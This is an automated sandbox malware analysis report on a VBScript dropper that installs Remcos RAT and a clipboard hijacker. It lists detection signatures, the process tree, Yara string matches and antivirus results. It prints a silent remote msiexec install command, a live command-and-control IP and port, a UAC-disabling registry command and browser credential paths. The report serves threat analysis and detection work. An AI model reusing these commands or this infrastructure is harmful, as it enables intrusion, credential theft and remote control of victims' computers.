Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
secondaryTask.vbs

Overview

General Information

Sample name:secondaryTask.vbs
Analysis ID:1565487
MD5:183d51767fe58e2bd256688315d25709
SHA1:2c0f959b61081a10a085ad8e8f8741a69e2d9934
SHA256:23723f9b4239194a21bf0df559f9e9df8aec1399899346311c09cdcd91a9f1b0
Tags:vbsuser-aachum
Infos:

Detection

Clipboard Hijacker, MicroClip, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
VBScript performs obfuscated calls to suspicious functions
Yara detected Clipboard Hijacker
Yara detected MicroClip
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found API chain indicative of debugger detection
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Injects a PE file into a foreign processes
Installs a MSI (Microsoft Installer) remotely
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Potential evasive VBS script found (sleep loop)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Checks for available system drives (often done to infect USB drives)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 2976 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\secondaryTask.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • msiexec.exe (PID: 1828 cmdline: "C:\Windows\System32\msiexec.exe" /i https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi /qn MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 4896 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 3552 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 9BBAE1314E73A4B36581DE9B4621B078 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • EHttpSrv.exe (PID: 6024 cmdline: "C:\Users\user\AppData\Local\Temp\EHttpSrv.exe" MD5: 9329BA45C8B97485926A171E34C2ABB8)
      • cmd.exe (PID: 6864 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Updwork.exe (PID: 6032 cmdline: "C:\Users\user\AppData\Local\Temp\Updwork.exe" MD5: 253C52411B256E4AF301CBA58DCB6CEF)
      • WerFault.exe (PID: 6040 cmdline: "C:\Windows\System32\WerFault.exe" MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EHttpSrv.exe (PID: 6868 cmdline: "C:\Users\user\AppData\Local\Temp\EHttpSrv.exe" MD5: 9329BA45C8B97485926A171E34C2ABB8)
    • cmd.exe (PID: 5672 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • EHttpSrv.exe (PID: 6336 cmdline: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe MD5: 9329BA45C8B97485926A171E34C2ABB8)
  • RaftelibeGasrss.exe (PID: 4416 cmdline: "C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe" MD5: 253C52411B256E4AF301CBA58DCB6CEF)
    • WerFault.exe (PID: 5504 cmdline: "C:\Windows\System32\WerFault.exe" MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EHttpSrv.exe (PID: 3212 cmdline: "C:\Users\user\AppData\Local\Temp\EHttpSrv.exe" MD5: 9329BA45C8B97485926A171E34C2ABB8)
    • cmd.exe (PID: 6908 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • EHttpSrv.exe (PID: 6808 cmdline: "C:\Users\user\AppData\Local\Temp\EHttpSrv.exe" MD5: 9329BA45C8B97485926A171E34C2ABB8)
    • cmd.exe (PID: 3260 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • EHttpSrv.exe (PID: 6104 cmdline: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe MD5: 9329BA45C8B97485926A171E34C2ABB8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["185.157.162.126:1995:1"], "Assigned name": "v", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "qsdazeazd-EL00KX", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\yljutqdulamJoeSecurity_RemcosYara detected Remcos RATJoe Security
    C:\Users\user\AppData\Local\Temp\yljutqdulamJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      C:\Users\user\AppData\Local\Temp\yljutqdulamWindows_Trojan_Remcos_b296e965unknownunknown
      • 0x6aaa8:$a1: Remcos restarted by watchdog!
      • 0x6b020:$a3: %02i:%02i:%02i:%03i
      C:\Users\user\AppData\Local\Temp\yljutqdulamREMCOS_RAT_variantsunknownunknown
      • 0x64afc:$str_a1: C:\Windows\System32\cmd.exe
      • 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
      • 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
      • 0x64b6c:$str_b2: Executing file:
      • 0x65bec:$str_b3: GetDirectListeningPort
      • 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
      • 0x65718:$str_b7: \update.vbs
      • 0x64b94:$str_b9: Downloaded file:
      • 0x64b80:$str_b10: Downloading file:
      • 0x64c24:$str_b12: Failed to upload file:
      • 0x65bb4:$str_b13: StartForward
      • 0x65bd4:$str_b14: StopForward
      • 0x65670:$str_b15: fso.DeleteFile "
      • 0x65604:$str_b16: On Error Resume Next
      • 0x656a0:$str_b17: fso.DeleteFolder "
      • 0x64c14:$str_b18: Uploaded file:
      • 0x64bd4:$str_b19: Unable to delete:
      • 0x65638:$str_b20: while fso.FileExists("
      • 0x650b1:$str_c0: [Firefox StoredLogins not found]
      C:\Users\user\AppData\Local\Temp\yljutqdulamINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
      • 0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      • 0x6497c:$s1: CoGetObject
      • 0x64990:$s1: CoGetObject
      • 0x649ac:$s1: CoGetObject
      • 0x6e938:$s1: CoGetObject
      • 0x6493c:$s2: Elevation:Administrator!new:
      Click to see the 5 entries
      SourceRuleDescriptionAuthorStrings
      00000007.00000003.2472818121.00000000021F0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Clipboard_Hijacker_5Yara detected Clipboard HijackerJoe Security
        00000007.00000003.2472818121.00000000021F0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_MicroClipYara detected MicroClipJoe Security
          00000020.00000002.3108383923.0000000000472000.00000008.00000001.01000000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                Click to see the 55 entries
                SourceRuleDescriptionAuthorStrings
                8.2.cmd.exe.33007f8.1.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  8.2.cmd.exe.33007f8.1.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                  • 0x13648:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                  • 0x13610:$s2: Elevation:Administrator!new:
                  8.2.cmd.exe.3302800.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    8.2.cmd.exe.3302800.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                    • 0x11640:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                    • 0x11608:$s2: Elevation:Administrator!new:
                    7.3.Updwork.exe.23c0000.0.raw.unpackJoeSecurity_Clipboard_Hijacker_5Yara detected Clipboard HijackerJoe Security
                      Click to see the 105 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\secondaryTask.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\secondaryTask.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\secondaryTask.vbs", ProcessId: 2976, ProcessName: wscript.exe
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 20.233.83.145, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\msiexec.exe, Initiated: true, ProcessId: 4896, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49707
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Updwork.exe, ProcessId: 6032, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
                      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\secondaryTask.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\secondaryTask.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\secondaryTask.vbs", ProcessId: 2976, ProcessName: wscript.exe
                      No Suricata rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\http_dll.dllAvira: detection malicious, Label: TR/HijackLoader.cugkp
                      Source: C:\Users\user\AppData\Local\Temp\dsxAvira: detection malicious, Label: BDS/Backdoor.Gen
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeAvira: detection malicious, Label: HEUR/AGEN.1338067
                      Source: C:\Users\user\AppData\Local\Temp\RaftelibeGarss\zlib1.dllAvira: detection malicious, Label: HEUR/AGEN.1363590
                      Source: C:\Users\user\AppData\Local\Temp\yljutqdulamAvira: detection malicious, Label: BDS/Backdoor.Gen
                      Source: 30.2.cmd.exe.51900c8.7.raw.unpackMalware Configuration Extractor: Remcos {"Host:Port:Password": ["185.157.162.126:1995:1"], "Assigned name": "v", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "qsdazeazd-EL00KX", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                      Source: C:\Users\user\AppData\Local\Temp\RaftelibeGarss\zlib1.dllReversingLabs: Detection: 45%
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeReversingLabs: Detection: 36%
                      Source: C:\Users\user\AppData\Local\Temp\dsxReversingLabs: Detection: 89%
                      Source: C:\Users\user\AppData\Local\Temp\http_dll.dllReversingLabs: Detection: 62%
                      Source: C:\Users\user\AppData\Local\Temp\yljutqdulamReversingLabs: Detection: 89%
                      Source: Yara matchFile source: 16.2.cmd.exe.59c00c8.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.cmd.exe.51900c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.cmd.exe.59c00c8.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.cmd.exe.51900c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000010.00000002.2756412982.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.3107816901.0000000005190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 5672, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EHttpSrv.exe PID: 6336, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 3260, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EHttpSrv.exe PID: 6104, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\yljutqdulam, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\dsx, type: DROPPED
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Local\Temp\dsxJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\RaftelibeGarss\zlib1.dllJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\yljutqdulamJoe Sandbox ML: detected
                      Source: cmd.exe, 00000010.00000002.2756412982.00000000059C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_92f4d3c4-f

                      Exploits

                      barindex
                      Source: Yara matchFile source: 8.2.cmd.exe.33007f8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.cmd.exe.3302800.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.EHttpSrv.exe.242d2e4.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.cmd.exe.4c22f90.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.EHttpSrv.exe.240ba18.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.cmd.exe.4b6f6c4.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.EHttpSrv.exe.23bbee4.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.cmd.exe.59c00c8.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.cmd.exe.51900c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.EHttpSrv.exe.23bb2e4.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.EHttpSrv.exe.25a7b90.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.cmd.exe.5015f90.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.cmd.exe.5294b90.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.EHttpSrv.exe.2399a18.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.cmd.exe.4b91b90.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.EHttpSrv.exe.2367ee4.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.EHttpSrv.exe.23e12e4.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.EHttpSrv.exe.2345a18.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.EHttpSrv.exe.23bfa18.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.EHttpSrv.exe.25856c4.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.EHttpSrv.exe.25a6f90.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.cmd.exe.5016b90.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.cmd.exe.2c007f8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.cmd.exe.59c00c8.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.EHttpSrv.exe.23e1ee4.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.EHttpSrv.exe.24f9b90.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.cmd.exe.4c016c4.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.EHttpSrv.exe.23672e4.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.EHttpSrv.exe.24f8f90.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.EHttpSrv.exe.242dee4.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.cmd.exe.51900c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.cmd.exe.33007f8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.cmd.exe.4b90f90.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.EHttpSrv.exe.24d76c4.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.cmd.exe.5293f90.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.cmd.exe.52726c4.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.cmd.exe.4c23b90.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.cmd.exe.2bd4848.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.cmd.exe.4ff46c4.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000020.00000002.3108383923.0000000000472000.00000008.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2390138149.0000000003300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2756412982.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.2755135882.0000000000472000.00000008.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.2833446992.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.3107816901.0000000005190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: EHttpSrv.exe PID: 6024, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6864, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EHttpSrv.exe PID: 6868, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 5672, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EHttpSrv.exe PID: 6336, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EHttpSrv.exe PID: 3212, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6908, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EHttpSrv.exe PID: 6808, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 3260, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EHttpSrv.exe PID: 6104, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\yljutqdulam, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\dsx, type: DROPPED
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.6:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:49709 version: TLS 1.2
                      Source: Binary string: C:\Users\root\Desktop\clipmain\CryptoAddressReplacer\Release\CryptoAddressReplacer.pdb source: Updwork.exe, 00000007.00000003.2472818121.00000000021F0000.00000004.00001000.00020000.00000000.sdmp, Updwork.exe, 00000007.00000003.2472764493.00000000023C0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000014.00000002.3386555271.00000000024C1000.00000002.00000400.00020000.00000000.sdmp, RaftelibeGasrss.exe, 00000016.00000003.2765936238.0000000002930000.00000004.00001000.00020000.00000000.sdmp, RaftelibeGasrss.exe, 00000016.00000003.2765868218.0000000002980000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 0000001B.00000002.3386408179.0000000000421000.00000002.00000400.00020000.00000000.sdmp
                      Source: Binary string: d:\installbuild\kalab\ess_4_0_400\build\apps\work\release\http_server\winnt32\EHttpSrv.pdb source: EHttpSrv.exe, 00000006.00000000.2277424439.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000006.00000002.2333090341.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000000F.00000002.2441043079.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000000F.00000000.2387457596.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000017.00000002.2754803163.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000017.00000000.2671664979.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000018.00000000.2727976985.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000018.00000002.2780689500.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000001D.00000002.2885414724.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000001D.00000000.2832914640.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000020.00000000.3017969340.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000020.00000002.3108167412.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe.3.dr
                      Source: Binary string: msvcr80.i386.pdb source: msvcr80.dll.3.dr
                      Source: Binary string: d:\installbuild\kalab\ess_4_0_400\build\apps\work\release\http_server\winnt32\EHttpSrv.pdb@@P5@ source: EHttpSrv.exe, 00000006.00000000.2277424439.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000006.00000002.2333090341.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000000F.00000002.2441043079.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000000F.00000000.2387457596.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000017.00000002.2754803163.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000017.00000000.2671664979.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000018.00000000.2727976985.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000018.00000002.2780689500.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000001D.00000002.2885414724.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000001D.00000000.2832914640.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000020.00000000.3017969340.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000020.00000002.3108167412.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe.3.dr
